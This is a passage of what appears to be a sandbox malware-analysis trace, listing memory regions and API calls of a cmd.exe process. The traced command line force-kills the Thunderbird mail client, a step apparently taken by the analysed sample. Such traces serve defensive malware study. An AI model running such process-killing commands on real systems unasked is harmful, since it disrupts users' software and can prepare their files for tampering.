0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5629 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5630 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 5631 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 5632 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 5633 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 5634 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 5635 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 5636 start_va = 0xf10000 end_va = 0xf61fff monitored = 1 entry_point = 0xf24fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 5637 start_va = 0xf70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 5638 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5639 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 5640 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5641 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5642 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 5643 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5644 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 5645 start_va = 0x1d0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 5646 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5647 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5648 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5649 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5650 start_va = 0x400000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5651 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5652 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5653 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5654 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 5655 start_va = 0x590000 end_va = 0x64dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5656 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5657 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5658 start_va = 0x490000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 5659 start_va = 0x650000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 5660 start_va = 0x750000 end_va = 0x8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 5661 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5662 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5663 start_va = 0x900000 end_va = 0xc36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 399 os_tid = 0xfb8 [0225.050] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0225.050] __set_app_type (_Type=0x1) [0225.050] __p__fmode () returned 0x74974d6c [0225.050] __p__commode () returned 0x74975b1c [0225.050] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf25200) returned 0x0 [0225.050] __getmainargs (in: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0, _DoWildCard=0, _StartInfo=0xf360fc | out: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0) returned 0 [0225.051] GetCurrentThreadId () returned 0xfb8 [0225.051] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xfb8) returned 0x78 [0225.051] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0225.051] GetProcAddress (hModule=0x75600000, lpProcName="SetThreadUILanguage") returned 0x75642510 [0225.051] SetThreadUILanguage (LangId=0x0) returned 0x409 [0225.056] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0225.057] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0225.057] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0225.057] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0225.057] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0225.057] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0225.057] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0225.057] GetConsoleOutputCP () returned 0x1b5 [0225.058] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0225.058] SetConsoleCtrlHandler (HandlerRoutine=0xf30e40, Add=1) returned 1 [0225.058] _get_osfhandle (_FileHandle=1) returned 0x130 [0225.058] SetConsoleMode (hConsoleHandle=0x130, dwMode=0x0) returned 0 [0225.058] _get_osfhandle (_FileHandle=1) returned 0x130 [0225.058] GetConsoleMode (in: hConsoleHandle=0x130, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0225.058] _get_osfhandle (_FileHandle=0) returned 0x158 [0225.058] GetConsoleMode (in: hConsoleHandle=0x158, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0225.058] GetEnvironmentStringsW () returned 0x497cc8* [0225.058] GetProcessHeap () returned 0x490000 [0225.058] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xa1a) returned 0x4986f0 [0225.059] FreeEnvironmentStringsA (penv="A") returned 1 [0225.059] GetProcessHeap () returned 0x490000 [0225.059] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x4) returned 0x490550 [0225.059] GetEnvironmentStringsW () returned 0x497cc8* [0225.059] GetProcessHeap () returned 0x490000 [0225.059] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xa1a) returned 0x499118 [0225.059] FreeEnvironmentStringsA (penv="A") returned 1 [0225.059] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0225.059] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0225.059] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0225.059] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0225.059] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0225.059] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0225.060] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0225.060] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0225.060] RegCloseKey (hKey=0x88) returned 0x0 [0225.060] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0225.060] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0225.060] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0225.060] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0225.060] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0225.060] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0225.060] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0225.060] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0225.060] RegCloseKey (hKey=0x88) returned 0x0 [0225.060] time (in: timer=0x0 | out: timer=0x0) returned 0x6234424f [0225.060] srand (_Seed=0x6234424f) [0225.060] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im thunderbird.exe \"" [0225.061] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im thunderbird.exe \"" [0225.061] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0225.061] GetProcessHeap () returned 0x490000 [0225.061] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x210) returned 0x499b40 [0225.061] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x499b48, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0225.061] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0225.061] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0225.061] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0225.061] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0225.061] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0225.061] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0225.061] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0225.061] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0225.061] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0225.061] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0225.062] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0225.062] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0225.062] GetProcessHeap () returned 0x490000 [0225.063] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x4986f0) returned 1 [0225.063] GetEnvironmentStringsW () returned 0x497cc8* [0225.063] GetProcessHeap () returned 0x490000 [0225.063] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xa32) returned 0x49a798 [0225.063] FreeEnvironmentStringsA (penv="A") returned 1 [0225.063] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0225.063] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0225.063] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0225.063] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0225.063] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0225.063] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0225.063] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0225.063] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0225.063] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0225.063] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0225.064] GetProcessHeap () returned 0x490000 [0225.064] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x44) returned 0x4905c8 [0225.064] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0225.068] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0225.068] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0225.069] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x490618 [0225.069] FindClose (in: hFindFile=0x490618 | out: hFindFile=0x490618) returned 1 [0225.069] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x490618 [0225.070] FindClose (in: hFindFile=0x490618 | out: hFindFile=0x490618) returned 1 [0225.070] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0225.070] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x490618 [0225.070] FindClose (in: hFindFile=0x490618 | out: hFindFile=0x490618) returned 1 [0225.070] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0225.070] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0225.070] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0225.070] GetProcessHeap () returned 0x490000 [0225.071] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x49a798) returned 1 [0225.071] GetEnvironmentStringsW () returned 0x497cc8* [0225.071] GetProcessHeap () returned 0x490000 [0225.071] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xa76) returned 0x499d58 [0225.071] FreeEnvironmentStringsA (penv="=") returned 1 [0225.071] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0225.071] GetProcessHeap () returned 0x490000 [0225.072] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x4905c8) returned 1 [0225.072] GetProcessHeap () returned 0x490000 [0225.072] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x400e) returned 0x49bc58 [0225.073] GetProcessHeap () returned 0x490000 [0225.073] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x52) returned 0x49a7d8 [0225.073] GetProcessHeap () returned 0x490000 [0225.073] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x4008) returned 0x49fc70 [0225.073] GetProcessHeap () returned 0x490000 [0225.073] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x4008) returned 0x4a3c80 [0225.074] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0225.075] GetProcessHeap () returned 0x490000 [0225.075] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x418) returned 0x49a838 [0225.075] SetErrorMode (uMode=0x0) returned 0x8003 [0225.075] SetErrorMode (uMode=0x1) returned 0x0 [0225.075] GetFullPathNameW (in: lpFileName="taskkill \\f \\.", nBufferLength=0x208, lpBuffer=0x49a840, lpFilePart=0x19fbac | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f", lpFilePart=0x19fbac*="f") returned 0x29 [0225.075] SetErrorMode (uMode=0x8003) returned 0x1 [0225.075] GetProcessHeap () returned 0x490000 [0225.075] RtlReAllocateHeap (Heap=0x490000, Flags=0x0, Ptr=0x49a838, Size=0x84) returned 0x49a838 [0225.075] GetProcessHeap () returned 0x490000 [0225.075] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x49a838) returned 0x84 [0225.075] NeedCurrentDirectoryForExePathW (ExeName="taskkill \\f \\.") returned 1 [0225.075] GetProcessHeap () returned 0x490000 [0225.075] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x62) returned 0x49a8c8 [0225.075] GetProcessHeap () returned 0x490000 [0225.075] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xb8) returned 0x49a938 [0225.076] GetProcessHeap () returned 0x490000 [0225.076] RtlReAllocateHeap (Heap=0x490000, Flags=0x0, Ptr=0x49a938, Size=0x62) returned 0x49a938 [0225.076] GetProcessHeap () returned 0x490000 [0225.076] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x49a938) returned 0x62 [0225.076] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0225.076] GetProcessHeap () returned 0x490000 [0225.076] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xe0) returned 0x49a9a8 [0225.080] GetProcessHeap () returned 0x490000 [0225.080] RtlReAllocateHeap (Heap=0x490000, Flags=0x0, Ptr=0x49a9a8, Size=0x76) returned 0x49a9a8 [0225.081] GetProcessHeap () returned 0x490000 [0225.081] RtlSizeHeap (HeapHandle=0x490000, Flags=0x0, MemoryPointer=0x49a9a8) returned 0x76 [0225.081] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0225.081] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f\\im thunderbird.exe ", fInfoLevelId=0x1, lpFindFileData=0x19f958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f958) returned 0xffffffff [0225.081] GetLastError () returned 0x3 [0225.081] GetProcessHeap () returned 0x490000 [0225.082] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x49fc70) returned 1 [0225.082] GetProcessHeap () returned 0x490000 [0225.083] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x4a3c80) returned 1 [0225.083] GetProcessHeap () returned 0x490000 [0225.083] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x49bc58) returned 1 [0225.083] GetConsoleOutputCP () returned 0x1b5 [0225.085] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0225.085] GetUserDefaultLCID () returned 0x409 [0225.086] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xf434a0, cchData=8 | out: lpLCData=":") returned 2 [0225.086] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0225.086] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0225.086] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0225.086] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf434b0, cchData=8 | out: lpLCData="/") returned 2 [0225.086] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf43500, cchData=32 | out: lpLCData="Mon") returned 4 [0225.086] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf43540, cchData=32 | out: lpLCData="Tue") returned 4 [0225.086] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf43580, cchData=32 | out: lpLCData="Wed") returned 4 [0225.086] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf435c0, cchData=32 | out: lpLCData="Thu") returned 4 [0225.086] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf43600, cchData=32 | out: lpLCData="Fri") returned 4 [0225.086] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf43640, cchData=32 | out: lpLCData="Sat") returned 4 [0225.086] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf43680, cchData=32 | out: lpLCData="Sun") returned 4 [0225.086] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf434c0, cchData=8 | out: lpLCData=".") returned 2 [0225.086] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf434e0, cchData=8 | out: lpLCData=",") returned 2 [0225.086] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0225.088] GetProcessHeap () returned 0x490000 [0225.088] RtlAllocateHeap 